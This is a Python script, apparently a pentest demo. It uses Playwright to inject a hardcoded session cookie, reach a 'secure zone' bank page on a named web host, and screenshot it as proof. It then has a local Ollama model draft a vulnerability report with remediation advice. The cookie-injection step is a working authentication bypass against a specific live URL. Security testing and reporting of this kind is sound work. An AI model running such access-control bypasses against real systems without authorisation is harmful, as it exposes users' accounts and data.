import asyncio
from playwright.async_api import async_playwright
import ollama

# CONFIGURATION

TARGET_URL = "https://python-pickwiz.onrender.com/secure-zone/bank"
COOKIE_NAME = "session_token"
COOKIE_VALUE = "secure_user_session_12345"
SCREENSHOT_PATH = "proof_of_exploit.png"
REPORT_PATH = "vulnerability_report.md"
OLLAMA_MODEL = "llama3.2"


# STEP 1: EXPLOIT & SCREENSHOT (PLAYWRIGHT)

async def exploit_and_capture():
    print(f"[*] Launching headless browser...")
    async with async_playwright() as p:
        # Launch an invisible (headless) Chromium browser
        browser = await p.chromium.launch(headless=True)
        context = await browser.new_context()

        # Inject the hardcoded cookie into the browser context
        await context.add_cookies([{
            'name': COOKIE_NAME,
            'value': COOKIE_VALUE,
            'domain': 'python-pickwiz.onrender.com',
            'path': '/'
        }])

        page = await context.new_page()
        print(f"[*] Navigating to {TARGET_URL} with injected cookie...")
        await page.goto(TARGET_URL)

        # Wait for the page to fully load before taking the picture
        await page.wait_for_load_state('networkidle')

        print(f"[*] Taking screenshot of the secure zone...")
        await page.screenshot(path=SCREENSHOT_PATH)
        await browser.close()

    print(f"[+] Exploit successful! Screenshot saved as {SCREENSHOT_PATH}")



# STEP 2: AI REPORT GENERATION (OLLAMA)

def generate_ai_report():
    print(f"[*] Generating AI report using Ollama ({OLLAMA_MODEL})...")

    # This is the prompt we send to the AI.
    prompt = f"""You are a Senior Penetration Tester. I have found a Broken Access Control vulnerability via a hardcoded session cookie in a banking application.

    Target URL: {TARGET_URL}
    Vulnerable Parameter: Cookie '{COOKIE_NAME}'
    Payload Used: {COOKIE_VALUE}
    Result: Successfully bypassed authentication and accessed the secure bank dashboard without valid credentials.

    Please write a professional penetration testing report in Markdown format. 
    It MUST include these exact sections:
    1. **Executive Summary** (Explain the risk simply for a non-technical manager).
    2. **Technical Details** (Explain the HTTP request/cookie. YOU MUST include this exact line to display the proof screenshot: `![Proof of Exploit](proof_of_exploit.png)`)
    3. **Business Impact** (What is the actual risk to the bank and its customers?).
    4. **Remediation** (How should the developer fix this in Python/Flask? Provide secure code examples).
    """

    # Send the prompt to your local Ollama instance
    response = ollama.chat(model=OLLAMA_MODEL, messages=[
        {'role': 'user', 'content': prompt},
    ])

    # Extract the text generated by the AI
    report_content = response['message']['content']

    # Save the AI's response to a Markdown file
    with open(REPORT_PATH, 'w', encoding='utf-8') as f:
        f.write(report_content)

    print(f"[+] Report successfully saved to {REPORT_PATH}")



# MAIN EXECUTION

async def main():
    print("--- AI-Powered Vulnerability Reporter ---")
    print("Step 1: Exploiting target and capturing evidence...")
    await exploit_and_capture()

    print("\nStep 2: Analyzing findings and generating report...")
    generate_ai_report()

    print(f"\n[✓] Process complete! Open '{REPORT_PATH}' in your IDE or GitHub to see your work.")


if __name__ == "__main__":
    asyncio.run(main())
